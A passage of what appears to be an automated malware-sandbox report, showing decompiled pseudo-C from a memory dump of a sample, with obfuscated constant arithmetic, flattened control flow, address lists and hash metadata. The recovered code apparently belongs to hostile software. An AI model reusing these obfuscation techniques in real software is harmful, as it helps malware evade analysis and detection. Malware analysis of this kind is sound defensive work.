                                                                                                                                                                                                                    				signed int _v1620;
                                                                                                                                                                                                                    				signed int _v1624;
                                                                                                                                                                                                                    				signed int _v1628;
                                                                                                                                                                                                                    				signed int _v1632;
                                                                                                                                                                                                                    				signed int _v1636;
                                                                                                                                                                                                                    				signed int _v1640;
                                                                                                                                                                                                                    				signed int _v1644;
                                                                                                                                                                                                                    				signed int _v1648;
                                                                                                                                                                                                                    				signed int _v1652;
                                                                                                                                                                                                                    				signed int _v1656;
                                                                                                                                                                                                                    				signed int _v1660;
                                                                                                                                                                                                                    				signed int _v1664;
                                                                                                                                                                                                                    				signed int _v1668;
                                                                                                                                                                                                                    				signed int _v1672;
                                                                                                                                                                                                                    				signed int _v1676;
                                                                                                                                                                                                                    				signed int _v1680;
                                                                                                                                                                                                                    				signed int _t261;
                                                                                                                                                                                                                    				signed int _t275;
                                                                                                                                                                                                                    				signed int _t278;
                                                                                                                                                                                                                    				signed int _t279;
                                                                                                                                                                                                                    				signed int _t306;
                                                                                                                                                                                                                    				void* _t307;
                                                                                                                                                                                                                    				signed int* _t310;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t310 =  &_v1680;
                                                                                                                                                                                                                    				_v1572 = 0xbf062f;
                                                                                                                                                                                                                    				_v1568 = 0;
                                                                                                                                                                                                                    				_v1564 = 0;
                                                                                                                                                                                                                    				_v1608 = 0x814847;
                                                                                                                                                                                                                    				_v1608 = _v1608 << 4;
                                                                                                                                                                                                                    				_v1608 = _v1608 ^ 0x08133ece;
                                                                                                                                                                                                                    				_v1648 = 0xce2bfc;
                                                                                                                                                                                                                    				_t306 = __ecx;
                                                                                                                                                                                                                    				_t307 = 0x9400104;
                                                                                                                                                                                                                    				_v1648 = _v1648 * 0x4c;
                                                                                                                                                                                                                    				_v1648 = _v1648 | 0xfd7f93dd;
                                                                                                                                                                                                                    				_v1648 = _v1648 ^ 0xfd728351;
                                                                                                                                                                                                                    				_v1580 = 0x8c82ab;
                                                                                                                                                                                                                    				_v1580 = _v1580 + 0xffffff7f;
                                                                                                                                                                                                                    				_v1580 = _v1580 ^ 0x0082c427;
                                                                                                                                                                                                                    				_v1596 = 0x355ddb;
                                                                                                                                                                                                                    				_t278 = 0x33;
                                                                                                                                                                                                                    				_t275 = 0x4a;
                                                                                                                                                                                                                    				_v1596 = _v1596 * 0x79;
                                                                                                                                                                                                                    				_v1596 = _v1596 ^ 0x193fb93e;
                                                                                                                                                                                                                    				_v1628 = 0xf346e7;
                                                                                                                                                                                                                    				_v1628 = _v1628 * 0x51;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0xaa4544f8;
                                                                                                                                                                                                                    				_v1628 = _v1628 ^ 0xe6b33f91;
                                                                                                                                                                                                                    				_v1672 = 0xaa818b;
                                                                                                                                                                                                                    				_v1672 = _v1672 >> 0xe;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0xc3d928ed;
                                                                                                                                                                                                                    				_v1672 = _v1672 << 0xe;
                                                                                                                                                                                                                    				_v1672 = _v1672 ^ 0x4a9faf17;
                                                                                                                                                                                                                    				_v1616 = 0xa72cd5;
                                                                                                                                                                                                                    				_v1616 = _v1616 / _t278;
                                                                                                                                                                                                                    				_v1616 = _v1616 / _t275;
                                                                                                                                                                                                                    				_v1616 = _v1616 ^ 0x00048de7;
                                                                                                                                                                                                                    				_v1584 = 0xbaeb96;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0xe9b728ed;
                                                                                                                                                                                                                    				_v1584 = _v1584 ^ 0xe9005290;
                                                                                                                                                                                                                    				_v1632 = 0xf91208;
                                                                                                                                                                                                                    				_v1632 = _v1632 + 0xffff773c;
                                                                                                                                                                                                                    				_v1632 = _v1632 * 0x3d;
                                                                                                                                                                                                                    				_v1632 = _v1632 ^ 0x3b341897;
                                                                                                                                                                                                                    				_v1636 = 0xbf8b82;
                                                                                                                                                                                                                    				_v1636 = _v1636 + 0x8129;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0x9870c07e;
                                                                                                                                                                                                                    				_v1636 = _v1636 ^ 0x98bd1c8e;
                                                                                                                                                                                                                    				_v1664 = 0x30d4f;
                                                                                                                                                                                                                    				_v1664 = _v1664 << 3;
                                                                                                                                                                                                                    				_v1664 = _v1664 | 0xbffd9fff;
                                                                                                                                                                                                                    				_v1664 = _v1664 ^ 0xbff19c67;
                                                                                                                                                                                                                    				_v1624 = 0xc9acee;
                                                                                                                                                                                                                    				_v1624 = _v1624 * 0x1d;
                                                                                                                                                                                                                    				_v1624 = _v1624 << 0xc;
                                                                                                                                                                                                                    				_v1624 = _v1624 ^ 0x896e0479;
                                                                                                                                                                                                                    				_v1656 = 0x216e82;
                                                                                                                                                                                                                    				_v1656 = _v1656 + 0xddb8;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x78b87eb9;
                                                                                                                                                                                                                    				_v1656 = _v1656 >> 0xb;
                                                                                                                                                                                                                    				_v1656 = _v1656 ^ 0x00090614;
                                                                                                                                                                                                                    				_v1576 = 0x547c30;
                                                                                                                                                                                                                    				_v1576 = _v1576 >> 7;
                                                                                                                                                                                                                    				_v1576 = _v1576 ^ 0x000f49cd;
                                                                                                                                                                                                                    				_v1588 = 0x2a5d03;
                                                                                                                                                                                                                    				_v1588 = _v1588 + 0xfffff094;
                                                                                                                                                                                                                    				_v1588 = _v1588 ^ 0x002a450f;
                                                                                                                                                                                                                    				_v1640 = 0x905128;
                                                                                                                                                                                                                    				_v1640 = _v1640 << 1;
                                                                                                                                                                                                                    				_v1640 = _v1640 + 0xffff5894;
                                                                                                                                                                                                                    				_v1640 = _v1640 ^ 0x011e2519;
                                                                                                                                                                                                                    				_v1680 = 0x65d755;
                                                                                                                                                                                                                    				_v1680 = _v1680 | 0xe5e6a65e;
                                                                                                                                                                                                                    				_v1680 = _v1680 + 0x6c67;
                                                                                                                                                                                                                    				_v1680 = _v1680 | 0x9ccd6f50;
                                                                                                                                                                                                                    				_v1680 = _v1680 ^ 0xfde2997d;
                                                                                                                                                                                                                    				_v1668 = 0x31f87;
                                                                                                                                                                                                                    				_v1668 = _v1668 >> 0xe;
                                                                                                                                                                                                                    				_v1668 = _v1668 << 8;
                                                                                                                                                                                                                    				_v1668 = _v1668 + 0xffff55de;
                                                                                                                                                                                                                    				_v1668 = _v1668 ^ 0xfffcf77f;
                                                                                                                                                                                                                    				_v1676 = 0x4e476e;
                                                                                                                                                                                                                    				_v1676 = _v1676 | 0x697b0875;
                                                                                                                                                                                                                    				_v1676 = _v1676 << 4;
                                                                                                                                                                                                                    				_v1676 = _v1676 + 0xffffd861;
                                                                                                                                                                                                                    				_v1676 = _v1676 ^ 0x97f528af;
                                                                                                                                                                                                                    				_v1604 = 0xa754ab;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x857e33fd;
                                                                                                                                                                                                                    				_v1604 = _v1604 ^ 0x85da1c4a;
                                                                                                                                                                                                                    				_v1660 = 0x593e40;
                                                                                                                                                                                                                    				_t279 = 0x44;
                                                                                                                                                                                                                    				_v1660 = _v1660 / _t279;
                                                                                                                                                                                                                    				_v1660 = _v1660 >> 0xf;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0xc2917ce6;
                                                                                                                                                                                                                    				_v1660 = _v1660 ^ 0xc29ac17a;
                                                                                                                                                                                                                    				_v1600 = 0xade4f1;
                                                                                                                                                                                                                    				_t280 = 0x51;
                                                                                                                                                                                                                    				_v1600 = _v1600 * 0x1e;
                                                                                                                                                                                                                    				_v1600 = _v1600 ^ 0x14680908;
                                                                                                                                                                                                                    				_v1620 = 0x4fe701;
                                                                                                                                                                                                                    				_v1620 = _v1620 | 0x93fdddb7;
                                                                                                                                                                                                                    				_v1620 = _v1620 * 0x7c;
                                                                                                                                                                                                                    				_v1620 = _v1620 ^ 0xaffffdbf;
                                                                                                                                                                                                                    				_v1644 = 0x396f19;
                                                                                                                                                                                                                    				_v1644 = _v1644 / _t280;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0xffff9b63;
                                                                                                                                                                                                                    				_v1644 = _v1644 + 0xffff0eae;
                                                                                                                                                                                                                    				_v1644 = _v1644 ^ 0xfffc274a;
                                                                                                                                                                                                                    				_v1612 = 0xa89a1e;
                                                                                                                                                                                                                    				_v1612 = _v1612 | 0x6d79b76f;
                                                                                                                                                                                                                    				_v1612 = _v1612 ^ 0x6df19e28;
                                                                                                                                                                                                                    				_v1652 = 0x81461f;
                                                                                                                                                                                                                    				_v1652 = _v1652 * 0x29;
                                                                                                                                                                                                                    				_t261 = _v1652 / _t275;
                                                                                                                                                                                                                    				_v1652 = _t261;
                                                                                                                                                                                                                    				_v1652 = _v1652 + 0x15d5;
                                                                                                                                                                                                                    				_v1652 = _v1652 ^ 0x0046b5c6;
                                                                                                                                                                                                                    				_v1592 = 0x81938e;
                                                                                                                                                                                                                    				_v1592 = _v1592 + 0xffff4859;
                                                                                                                                                                                                                    				_v1592 = _v1592 ^ 0x008102c3;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t307 != 0x9400104) {
                                                                                                                                                                                                                    						if(_t307 != 0xcc4e497) {
                                                                                                                                                                                                                    							_t316 = _t307 - 0xd7ba76a;
                                                                                                                                                                                                                    							if(_t307 == 0xd7ba76a) {
                                                                                                                                                                                                                    								_push( &_v1560);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(_v1592);
                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                    								_push(_v1652);
                                                                                                                                                                                                                    								_push(_v1612);
                                                                                                                                                                                                                    								return E00A7E05C(_v1644, _t316);
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						E00A6D804(_v1608, _v1648,  &_v1040, _t280, _v1580, _v1596);
                                                                                                                                                                                                                    						 *((short*)(E00A75011( &_v1040, _v1628, _v1672))) = 0;
                                                                                                                                                                                                                    						E00A6F1F6(_v1616,  &_v520, __eflags, _v1584, _v1632);
                                                                                                                                                                                                                    						_push(_v1656);
                                                                                                                                                                                                                    						_push(_v1624);
                                                                                                                                                                                                                    						_push(_v1664);
                                                                                                                                                                                                                    						E00A7E773(_v1588, __eflags,  &_v520, _v1640, 0xa612a4,  &_v1560, E00A81E60(0xa612a4, _v1636, __eflags),  &_v1040, _v1680);
                                                                                                                                                                                                                    						E00A7D6DF(_v1668, _t266, _v1676, _v1604);
                                                                                                                                                                                                                    						_t280 = _t306;
                                                                                                                                                                                                                    						_t261 = E00A7C400(_t306, _v1660,  &_v1560, _v1600, _v1620);
                                                                                                                                                                                                                    						_t310 =  &(_t310[0x16]);
                                                                                                                                                                                                                    						__eflags = _t261;
                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                    							_t307 = 0xd7ba76a;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						return _t261;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t307 = 0xcc4e497;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    					__eflags = _t307 - 0xde7d95a;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				return _t261;
                                                                                                                                                                                                                    			}











































                                                                                                                                                                                                                    0x00a75198
                                                                                                                                                                                                                    0x00a7519e
                                                                                                                                                                                                                    0x00a751ac
                                                                                                                                                                                                                    0x00a751b0
                                                                                                                                                                                                                    0x00a751b4
                                                                                                                                                                                                                    0x00a751bc
                                                                                                                                                                                                                    0x00a751c1
                                                                                                                                                                                                                    0x00a751c9
                                                                                                                                                                                                                    0x00a751da
                                                                                                                                                                                                                    0x00a751dc
                                                                                                                                                                                                                    0x00a751e1
                                                                                                                                                                                                                    0x00a751e5
                                                                                                                                                                                                                    0x00a751ed
                                                                                                                                                                                                                    0x00a751f5
                                                                                                                                                                                                                    0x00a751fd
                                                                                                                                                                                                                    0x00a75205
                                                                                                                                                                                                                    0x00a7520d
                                                                                                                                                                                                                    0x00a7521a
                                                                                                                                                                                                                    0x00a7521d
                                                                                                                                                                                                                    0x00a7521e
                                                                                                                                                                                                                    0x00a75222
                                                                                                                                                                                                                    0x00a7522a
                                                                                                                                                                                                                    0x00a75237
                                                                                                                                                                                                                    0x00a7523b
                                                                                                                                                                                                                    0x00a75243
                                                                                                                                                                                                                    0x00a7524b
                                                                                                                                                                                                                    0x00a75253
                                                                                                                                                                                                                    0x00a75258
                                                                                                                                                                                                                    0x00a75260
                                                                                                                                                                                                                    0x00a75265
                                                                                                                                                                                                                    0x00a7526d
                                                                                                                                                                                                                    0x00a7527d
                                                                                                                                                                                                                    0x00a75287
                                                                                                                                                                                                                    0x00a7528b
                                                                                                                                                                                                                    0x00a75293
                                                                                                                                                                                                                    0x00a7529b
                                                                                                                                                                                                                    0x00a752a3
                                                                                                                                                                                                                    0x00a752ab
                                                                                                                                                                                                                    0x00a752b3
                                                                                                                                                                                                                    0x00a752c0
                                                                                                                                                                                                                    0x00a752c4
                                                                                                                                                                                                                    0x00a752cc
                                                                                                                                                                                                                    0x00a752d4
                                                                                                                                                                                                                    0x00a752dc
                                                                                                                                                                                                                    0x00a752e4
                                                                                                                                                                                                                    0x00a752ec
                                                                                                                                                                                                                    0x00a752f4
                                                                                                                                                                                                                    0x00a752f9
                                                                                                                                                                                                                    0x00a75301
                                                                                                                                                                                                                    0x00a75309
                                                                                                                                                                                                                    0x00a75316
                                                                                                                                                                                                                    0x00a7531a
                                                                                                                                                                                                                    0x00a7531f
                                                                                                                                                                                                                    0x00a75327
                                                                                                                                                                                                                    0x00a7532f
                                                                                                                                                                                                                    0x00a75337
                                                                                                                                                                                                                    0x00a7533f
                                                                                                                                                                                                                    0x00a75344
                                                                                                                                                                                                                    0x00a7534c
                                                                                                                                                                                                                    0x00a75354
                                                                                                                                                                                                                    0x00a75359
                                                                                                                                                                                                                    0x00a75361
                                                                                                                                                                                                                    0x00a75369
                                                                                                                                                                                                                    0x00a75371
                                                                                                                                                                                                                    0x00a75379
                                                                                                                                                                                                                    0x00a75383
                                                                                                                                                                                                                    0x00a75387
                                                                                                                                                                                                                    0x00a7538f
                                                                                                                                                                                                                    0x00a75397
                                                                                                                                                                                                                    0x00a7539f
                                                                                                                                                                                                                    0x00a753a7
                                                                                                                                                                                                                    0x00a753af
                                                                                                                                                                                                                    0x00a753b7
                                                                                                                                                                                                                    0x00a753bf
                                                                                                                                                                                                                    0x00a753c7
                                                                                                                                                                                                                    0x00a753cc
                                                                                                                                                                                                                    0x00a753d1
                                                                                                                                                                                                                    0x00a753d9
                                                                                                                                                                                                                    0x00a753e1
                                                                                                                                                                                                                    0x00a753e9
                                                                                                                                                                                                                    0x00a753f1
                                                                                                                                                                                                                    0x00a753f6
                                                                                                                                                                                                                    0x00a753fe
                                                                                                                                                                                                                    0x00a75406
                                                                                                                                                                                                                    0x00a7540e
                                                                                                                                                                                                                    0x00a75416
                                                                                                                                                                                                                    0x00a7541e
                                                                                                                                                                                                                    0x00a7542c
                                                                                                                                                                                                                    0x00a75431
                                                                                                                                                                                                                    0x00a75435
                                                                                                                                                                                                                    0x00a7543a
                                                                                                                                                                                                                    0x00a75442
                                                                                                                                                                                                                    0x00a7544a
                                                                                                                                                                                                                    0x00a75459
                                                                                                                                                                                                                    0x00a7545a
                                                                                                                                                                                                                    0x00a7545e
                                                                                                                                                                                                                    0x00a75466
                                                                                                                                                                                                                    0x00a7546e
                                                                                                                                                                                                                    0x00a7547b
                                                                                                                                                                                                                    0x00a7547f
                                                                                                                                                                                                                    0x00a75487
                                                                                                                                                                                                                    0x00a75497
                                                                                                                                                                                                                    0x00a7549b
                                                                                                                                                                                                                    0x00a754a3
                                                                                                                                                                                                                    0x00a754ab
                                                                                                                                                                                                                    0x00a754b3
                                                                                                                                                                                                                    0x00a754bb
                                                                                                                                                                                                                    0x00a754c3
                                                                                                                                                                                                                    0x00a754cb
                                                                                                                                                                                                                    0x00a754d8
                                                                                                                                                                                                                    0x00a754e0
                                                                                                                                                                                                                    0x00a754e7
                                                                                                                                                                                                                    0x00a754eb
                                                                                                                                                                                                                    0x00a754f3
                                                                                                                                                                                                                    0x00a754fb
                                                                                                                                                                                                                    0x00a75503
                                                                                                                                                                                                                    0x00a7550b
                                                                                                                                                                                                                    0x00a75513
                                                                                                                                                                                                                    0x00a75513
                                                                                                                                                                                                                    0x00a75521
                                                                                                                                                                                                                    0x00a75523
                                                                                                                                                                                                                    0x00a75529
                                                                                                                                                                                                                    0x00a75536
                                                                                                                                                                                                                    0x00a75537
                                                                                                                                                                                                                    0x00a75538
                                                                                                                                                                                                                    0x00a75539
                                                                                                                                                                                                                    0x00a7553d
                                                                                                                                                                                                                    0x00a7553e
                                                                                                                                                                                                                    0x00a75542
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7554f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75529
                                                                                                                                                                                                                    0x00a75576
                                                                                                                                                                                                                    0x00a755a3
                                                                                                                                                                                                                    0x00a755aa
                                                                                                                                                                                                                    0x00a755af
                                                                                                                                                                                                                    0x00a755b8
                                                                                                                                                                                                                    0x00a755bc
                                                                                                                                                                                                                    0x00a755fe
                                                                                                                                                                                                                    0x00a75611
                                                                                                                                                                                                                    0x00a75621
                                                                                                                                                                                                                    0x00a7562f
                                                                                                                                                                                                                    0x00a75634
                                                                                                                                                                                                                    0x00a75637
                                                                                                                                                                                                                    0x00a75639
                                                                                                                                                                                                                    0x00a7563f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7563f
                                                                                                                                                                                                                    0x00a7555c
                                                                                                                                                                                                                    0x00a7555c
                                                                                                                                                                                                                    0x00a75649
                                                                                                                                                                                                                    0x00a7564b
                                                                                                                                                                                                                    0x00a7564b
                                                                                                                                                                                                                    0x00a7564b
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0|T$@>Y$gl$nGN
                                                                                                                                                                                                                    • API String ID: 0-1354711568
                                                                                                                                                                                                                    • Opcode ID: 77387edc1673916b7ea8844e6b2cf4052037c6ea9737becb43d4c0645f168508
                                                                                                                                                                                                                    • Instruction ID: f4daaf4bf37a54ee275e09dd3f21f755369edf2b295c84b159302a45da88d4ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77387edc1673916b7ea8844e6b2cf4052037c6ea9737becb43d4c0645f168508
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0C10EB14083819FC368CF65C98954BFBF5BBC4758F508A1DF2AA86260D7B18A49CF47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A6B354(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				intOrPtr _t225;
                                                                                                                                                                                                                    				intOrPtr* _t230;
                                                                                                                                                                                                                    				intOrPtr _t236;
                                                                                                                                                                                                                    				intOrPtr _t237;
                                                                                                                                                                                                                    				intOrPtr _t238;
                                                                                                                                                                                                                    				intOrPtr _t242;
                                                                                                                                                                                                                    				intOrPtr _t244;
                                                                                                                                                                                                                    				signed int _t262;
                                                                                                                                                                                                                    				signed int _t263;
                                                                                                                                                                                                                    				signed int _t264;
                                                                                                                                                                                                                    				signed int _t265;
                                                                                                                                                                                                                    				intOrPtr _t266;
                                                                                                                                                                                                                    				void* _t269;
                                                                                                                                                                                                                    				intOrPtr _t270;
                                                                                                                                                                                                                    				intOrPtr _t271;
                                                                                                                                                                                                                    				intOrPtr _t272;
                                                                                                                                                                                                                    				signed int* _t273;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t238 = __ecx;
                                                                                                                                                                                                                    				_t273 =  &_v108;
                                                                                                                                                                                                                    				_v8 = __edx;
                                                                                                                                                                                                                    				_v24 = __ecx;
                                                                                                                                                                                                                    				_v80 = 0x2e21ef;
                                                                                                                                                                                                                    				_v80 = _v80 | 0xac836833;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xdcb4;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x7c99250c;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xd02963bf;
                                                                                                                                                                                                                    				_v92 = 0x99e0cf;
                                                                                                                                                                                                                    				_v92 = _v92 >> 5;
                                                                                                                                                                                                                    				_v92 = _v92 | 0x8a1aebe2;
                                                                                                                                                                                                                    				_v92 = _v92 + 0xffff2833;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x8a1ecee2;
                                                                                                                                                                                                                    				_v96 = 0x7b1aa3;
                                                                                                                                                                                                                    				_v96 = _v96 * 0x54;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x4b7b4972;
                                                                                                                                                                                                                    				_v96 = _v96 + 0x2efa;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x632dfd89;
                                                                                                                                                                                                                    				_v44 = 0x64608;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xbd768e56;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0xbd704a43;
                                                                                                                                                                                                                    				_v48 = 0x54d941;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x59c73ba6;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x5993ee78;
                                                                                                                                                                                                                    				_v76 = 0x32e68d;
                                                                                                                                                                                                                    				_t262 = 0x66;
                                                                                                                                                                                                                    				_v76 = _v76 * 0x26;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xffff2e5c;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x078f1f12;
                                                                                                                                                                                                                    				_v68 = 0xdaa6d9;
                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                    				_t269 = 0xff8405e;
                                                                                                                                                                                                                    				_v68 = _v68 * 0x36;
                                                                                                                                                                                                                    				_v68 = _v68 | 0x4dcaed1b;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x6fd407d6;
                                                                                                                                                                                                                    				_v72 = 0x5aa548;
                                                                                                                                                                                                                    				_v72 = _v72 / _t262;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xcac2;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x000ac8c5;
                                                                                                                                                                                                                    				_v64 = 0x43cd2c;
                                                                                                                                                                                                                    				_v64 = _v64 << 0xd;
                                                                                                                                                                                                                    				_t263 = 0x28;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x4e;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x1060c255;
                                                                                                                                                                                                                    				_v36 = 0x6976a2;
                                                                                                                                                                                                                    				_v36 = _v36 / _t263;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0005dcbe;
                                                                                                                                                                                                                    				_v108 = 0xeb5af0;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x1075682d;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x78da1f53;
                                                                                                                                                                                                                    				_v108 = _v108 >> 0xb;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x000c72a5;
                                                                                                                                                                                                                    				_v40 = 0xd8b8ee;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff2856;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x00d10e60;
                                                                                                                                                                                                                    				_v100 = 0xfdaa44;
                                                                                                                                                                                                                    				_v100 = _v100 >> 3;
                                                                                                                                                                                                                    				_v100 = _v100 << 6;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x07e7c48e;
                                                                                                                                                                                                                    				_v60 = 0x946929;
                                                                                                                                                                                                                    				_v60 = _v60 << 6;
                                                                                                                                                                                                                    				_v60 = _v60 | 0x5e1ace17;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x7f177e42;
                                                                                                                                                                                                                    				_v32 = 0x35193c;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0543b6c9;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x057d478c;
                                                                                                                                                                                                                    				_v104 = 0xfb72f1;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x10a1;
                                                                                                                                                                                                                    				_v104 = _v104 + 0x7d6b;
                                                                                                                                                                                                                    				_t264 = 0x27;
                                                                                                                                                                                                                    				_t272 = _v8;
                                                                                                                                                                                                                    				_v104 = _v104 * 0x27;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x2660f9e2;
                                                                                                                                                                                                                    				_v28 = 0xa9ecc2;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff61c4;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00a731df;
                                                                                                                                                                                                                    				_v84 = 0x2b4eca;
                                                                                                                                                                                                                    				_v84 = _v84 + 0xdfc3;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xa9e2e267;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x529c50fa;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0xfb539ff8;
                                                                                                                                                                                                                    				_v88 = 0x42447e;
                                                                                                                                                                                                                    				_t142 =  &_v88; // 0x42447e
                                                                                                                                                                                                                    				_t237 = _v8;
                                                                                                                                                                                                                    				_v88 =  *_t142 * 0x79;
                                                                                                                                                                                                                    				_t145 =  &_v88; // 0x42447e
                                                                                                                                                                                                                    				_v88 =  *_t145 / _t264;
                                                                                                                                                                                                                    				_v88 = _v88 + 0xffff9257;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x00c7c299;
                                                                                                                                                                                                                    				_v56 = 0x7e7e08;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xb74d9530;
                                                                                                                                                                                                                    				_t265 = 0x79;
                                                                                                                                                                                                                    				_t266 = _v4;
                                                                                                                                                                                                                    				_v56 = _v56 / _t265;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x0183fec3;
                                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(_t269 != 0x3b56937) {
                                                                                                                                                                                                                    							if(_t269 == 0x884a25d) {
                                                                                                                                                                                                                    								_t242 = E00A703ED(_v44, _v48, _t225, _t272,  &_v16, _t238, _v76);
                                                                                                                                                                                                                    								_t273 =  &(_t273[5]);
                                                                                                                                                                                                                    								_v20 = _t242;
                                                                                                                                                                                                                    								if(_t242 == 0) {
                                                                                                                                                                                                                    									_t270 = _v20;
                                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                                    									E00A76A6B(_t237, _v28, _v84, _v88, _v56);
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t244 = _v16;
                                                                                                                                                                                                                    									if(_t244 == 0) {
                                                                                                                                                                                                                    										goto L16;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_v52 = _v52 + _t244;
                                                                                                                                                                                                                    										_t272 = _t272 - _t244;
                                                                                                                                                                                                                    										if(_t272 != 0) {
                                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                                    											_t225 = _v52;
                                                                                                                                                                                                                    											L11:
                                                                                                                                                                                                                    											_t238 = _v24;
                                                                                                                                                                                                                    											_t269 = 0x884a25d;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_v12 = _t266 + _t266;
                                                                                                                                                                                                                    											_t271 = E00A7C6D9(_t266 + _t266);
                                                                                                                                                                                                                    											if(_t271 == 0) {
                                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												E00A7056B(_t237, _v64, _t271, _t266, _v36, _v108, _v40);
                                                                                                                                                                                                                    												E00A76A6B(_t237, _v100, _v60, _v32, _v104);
                                                                                                                                                                                                                    												_t272 = _t266;
                                                                                                                                                                                                                    												_t236 = _t271 + _t266;
                                                                                                                                                                                                                    												_t266 = _v12;
                                                                                                                                                                                                                    												_t273 =  &(_t273[8]);
                                                                                                                                                                                                                    												_v52 = _t236;
                                                                                                                                                                                                                    												_t237 = _t271;
